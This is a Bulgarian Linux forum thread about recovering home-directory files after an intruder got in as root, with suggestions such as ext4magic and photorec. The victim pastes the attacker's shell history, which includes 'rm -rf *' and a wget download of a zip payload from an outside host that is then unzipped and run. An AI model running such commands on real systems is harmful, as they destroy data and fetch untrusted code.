Автор Тема: Възстановяване на файлове  (Прочетена 7334 пъти)

4096bits

  • Напреднали
  • *****
  • Публикации: 6152
    • Профил
Привет!
Снощи по някое време, някой с root потребителя е влязъл в системата ми и е изтрил всички файлове в домашната директория на моя си потребител. Моя грешка, но след инсталация на системата не съм променил паролата за root. Сега, въпросът ми е, с кой инструмент да пробвам да възстановя файловете. Изтрито е всичко, с изключение на скритите файлове и папки? С имената. Чувал съм за testdisk, photorec, но нещо чета, че имената били просто цифри и букви.

И да се занимавам ли да търся някакво съдействие от полиция или не си струва просто, защото сигнал пуснах през някакъв портал, но имам малко съмнения относно, ще стигне ли някъде.
Активен

As they say in Mexico, "Dasvidaniya!" Down there, that's two vidaniyas.

makeme

  • Напреднали
  • *****
  • Публикации: 895
  • Distribution: Many
  • Window Manager: KDE
    • Профил
Re: Възстановяване на файлове
« Отговор #1 -: Dec 07, 2017, 15:23 »
Съжалявам, колега, за това, което ти се е случило. Ако използваш ext3/4 може да погледнеш extundelete. photorec е много добър, но правилно си прочел за имената. Лично аз не съм го пробвал това extundelete, но съм му хвърлил око и ще се радвам да дадеш фийдбек. Успех!
« Последна редакция: Dec 07, 2017, 15:30 от makeme »
Активен

Distributions:  UbuntuMate; Kubuntu; CentOS; Kali; Raspberry Pi OS ...

remotexx

  • Напреднали
  • *****
  • Публикации: 3211
    • Профил
Re: Възстановяване на файлове
« Отговор #2 -: Dec 07, 2017, 16:54 »
Колега, а в кошчето погледна ли?

Тоа "хакер" ще да е бил бая невръстен май.. да търка от графичен инструмент файловете - защото мисля знаеш че под конзола (па даже и през конзолен инструментъ а-ла mc) такова нещо като скрити файлове няма (предполагам имаш предвид тия с дето имената почват с точка)  :P

та... ако не ги е тръкнал с натиснат Шифт (т.е. перманентно) верятно са в коша - е поне пъвите няколко ГБ т.е. според там колкото ти е зададен лимит на коша...

инак хората вече ти предложиха инструмент(и) за възстановяване (и не може като под една друга ОС да се възстановят имената, щото там се трие само първия символ и при възстановяване лесно се сещаш) и имай предвид че възстановявнето работи само ако не си презаписал нещо отгоре т.е. обик. диска се сваля (офлайн) и се прави копие преди да се предприеме каквото и да е (защото обикновен твърд диск не е флашка дето оптимизира износването на хардуера и винаги пише първо по останалите 'неизползвани' сектори преди да се върне пак на току що изтритите)
« Последна редакция: Dec 07, 2017, 16:59 от remotexx »
Активен

console

  • Напреднали
  • *****
  • Публикации: 243
    • Профил
    • WWW
Re: Възстановяване на файлове
« Отговор #3 -: Dec 07, 2017, 16:57 »
Абе я дай да го видиме тоя хубавец. Как се е хакнал в системата през ssh или ?

Кажи с каква дистрибуция си да изместиме МВР от сцената  ;D
Активен

“Ever tried. Ever failed. No matter. Try again. Fail again. Fail Better.”

makeme

  • Напреднали
  • *****
  • Публикации: 895
  • Distribution: Many
  • Window Manager: KDE
    • Профил
Re: Възстановяване на файлове
« Отговор #4 -: Dec 07, 2017, 17:21 »
Тоа "хакер" ще да е бил бая невръстен май.. да търка от графичен инструмент файловете - защото мисля знаеш че под конзола (па даже и през конзолен инструментъ а-ла mc) такова нещо като скрити файлове няма (предполагам имаш предвид тия с дето имената почват с точка)  :P

та... ако не ги е тръкнал с натиснат Шифт (т.е. перманентно) верятно са в коша - е поне пъвите няколко ГБ т.е. според там колкото ти е зададен лимит на коша...

Може да е ползвал "rm -rf *" . Ефектът е същия. :)

@4096bits, гледам, че инструмента, който ти предложих са го форкнали. ext4magic се казва новия. Може би е по-добре с него да опиташ, но пак казвам те са само за EXT* файлови системи.
Активен

Distributions:  UbuntuMate; Kubuntu; CentOS; Kali; Raspberry Pi OS ...

4096bits

  • Напреднали
  • *****
  • Публикации: 6152
    • Профил
Re: Възстановяване на файлове
« Отговор #5 -: Dec 07, 2017, 17:47 »
Точно с rm -rf * е свършил работата. Запазих history-то.
Код:
ls /
history
cd
ls -a
ls -s
install -o vsftpd
install --help
install vsftpd
apt-get
pkg
yum
ifconfig
cat /proc/cpuinfo
ls
cat /etc/issue
rm -rf *
cd victor
uptime
cd /home
cd
./go 32
chmod 777 *
cd groot
unzip groot
wget nasapaul.16mb.com/groot.zip
Забавното е, че пробва там наличните мениджъри на пакети и като вижда, че не става и е до там. :D

Във /var/log/auth.log не видях нещо нередно, но може и да не зная, за какво да гледам. Иначе машината ми е вързана с моя рутер безжично, а той пък за суича или рутера на доставчика. Помислих си да си вържа директно лапито за кабела на доставчика и да сканирам мрежата обаче ме домързя, а и тоз ме е налазил към полунощ. Та може да изчакам до тогава.

Смея се, но не ми е смешно. Имаше важни неща в една от папките. Останалото... дреме ми шаапката за него. Ще пробвам инструментите, които предложихте, като се преборя със страха от евентуално разочарование. Системата е Arch. В момента пиша от Убунту МАТЕ
« Последна редакция: Dec 07, 2017, 17:49 от 4096bits »
Активен

As they say in Mexico, "Dasvidaniya!" Down there, that's two vidaniyas.

makeme

  • Напреднали
  • *****
  • Публикации: 895
  • Distribution: Many
  • Window Manager: KDE
    • Профил
Re: Възстановяване на файлове
« Отговор #6 -: Dec 07, 2017, 17:52 »
Един страничен въпрос: Порта 22 ли си ти беше, или си го сменял ?
Активен

Distributions:  UbuntuMate; Kubuntu; CentOS; Kali; Raspberry Pi OS ...

4096bits

  • Напреднали
  • *****
  • Публикации: 6152
    • Профил
Re: Възстановяване на файлове
« Отговор #7 -: Dec 07, 2017, 17:56 »
Нищо не съм сменял
Активен

As they say in Mexico, "Dasvidaniya!" Down there, that's two vidaniyas.

makeme

  • Напреднали
  • *****
  • Публикации: 895
  • Distribution: Many
  • Window Manager: KDE
    • Профил
Re: Възстановяване на файлове
« Отговор #8 -: Dec 07, 2017, 19:51 »
Ето ти малък гайд за това новото. Пробвах го, работи, но както колегата по-горе каза: Може и да има презаписани файлове.

1. Демонтираш дяла/дяловете.
2.
Цитат
ext4magic /dev/sdb1 -s 4096 -J -f /home/ | grep “Inode:”

/dev/sdb1 - Това ти е партишъна
4096 - Това ти е големината на блока (трябва да я провериш предварително)
/home/ - Предполагам това искаш да възстановяваш
grep-а може и да го махнеш  и да видиш кой инод номер ти върши най-голяма работа

3.
Цитат
ext4magic /dev/sdb1 -s 4096 -R -I 1572865 -d RECOVERED_FILES/

1572865 - примерен инод номер
RECOVERED_FILES - Директорията в която ще ти възстанови файловете.

Надявам се да стане и при теб :)
« Последна редакция: Dec 07, 2017, 20:17 от makeme »
Активен

Distributions:  UbuntuMate; Kubuntu; CentOS; Kali; Raspberry Pi OS ...

4096bits

  • Напреднали
  • *****
  • Публикации: 6152
    • Профил
Re: Възстановяване на файлове
« Отговор #9 -: Dec 08, 2017, 12:42 »
Изписва ми грешка:
/dev/sda1 Error 13 while opening filesystem

Или:
Error 2 while opening filesystem
"RECOVERDIR"  accept for recoverdir
ext4magic : EXIT_SUCCESS

Файловата система е ехт4, дяла не е монтиран...
Активен

As they say in Mexico, "Dasvidaniya!" Down there, that's two vidaniyas.

makeme

  • Напреднали
  • *****
  • Публикации: 895
  • Distribution: Many
  • Window Manager: KDE
    • Профил
Re: Възстановяване на файлове
« Отговор #10 -: Dec 08, 2017, 13:18 »
Лоша работа. Това означава, че файловата система е corrupted и в такъв случай, ще трябва да ползваш photorec или подобните. Смисъл няма да можеш да възстановиш имената. Ако има някой по-запознат, нека се изкаже и той, но аз така мисля.
Активен

Distributions:  UbuntuMate; Kubuntu; CentOS; Kali; Raspberry Pi OS ...

4096bits

  • Напреднали
  • *****
  • Публикации: 6152
    • Профил
Re: Възстановяване на файлове
« Отговор #11 -: Dec 08, 2017, 17:14 »
Не зная, как файловата система е счупена, след като системата си работи съвсем нормално без никакви засечки.
В крайна сметка може и photorec  да използвам. Трябват ми само три вида файлове, а имената ще мога да ги възстановя на ръка като погледна съдържанието. Или пък някак ще го автоматизирам и това, ако са прекалено много.

Благодаря!
Активен

As they say in Mexico, "Dasvidaniya!" Down there, that's two vidaniyas.

Acho

  • Напреднали
  • *****
  • Публикации: 5256
  • Distribution: Slackware, MikroTik - сървърно
  • Window Manager: console only
    • Профил
    • WWW
Re: Възстановяване на файлове
« Отговор #12 -: Mar 16, 2018, 09:11 »
Пак спамове от рашъните ? Деа и простотиите.
Активен

CPU - Intel Quad-Core Q8400, 2.66 GHz; Fan - Intel Box; MB - Intel G41M-T2; RAM - DDR2-800, Kingston HyperX, 2X2048 MB; VC - onboard, Intel G41 Express Chipset; HDD - Toshiba, 500 GB, SATAII; SB - Realtek HD Audio; DVD-RW - TSSTcorp DVD-RW; LAN - Realtek PCI-E GBE Controller; PSU - Fortron 350 Watt.

vektorman

  • Напреднали
  • *****
  • Публикации: 206
    • Профил
Re: Възстановяване на файлове
« Отговор #13 -: Mar 16, 2018, 10:12 »
Попробуйте программы восстановления данных. Что-нибудь типа Bitwar Data Recovery

Привет, товарищ Штирлиц!
Активен

nikolin

  • Напреднали
  • *****
  • Публикации: 225
  • Distribution: Slax
  • Window Manager: KDE & xlunch
    • Профил
Re: Възстановяване на файлове
« Отговор #14 -: Mar 17, 2018, 01:00 »
Тук пише за няколко дистрота , но за Trinity Rescue Kit виждам и на други места добри отзиви.
Активен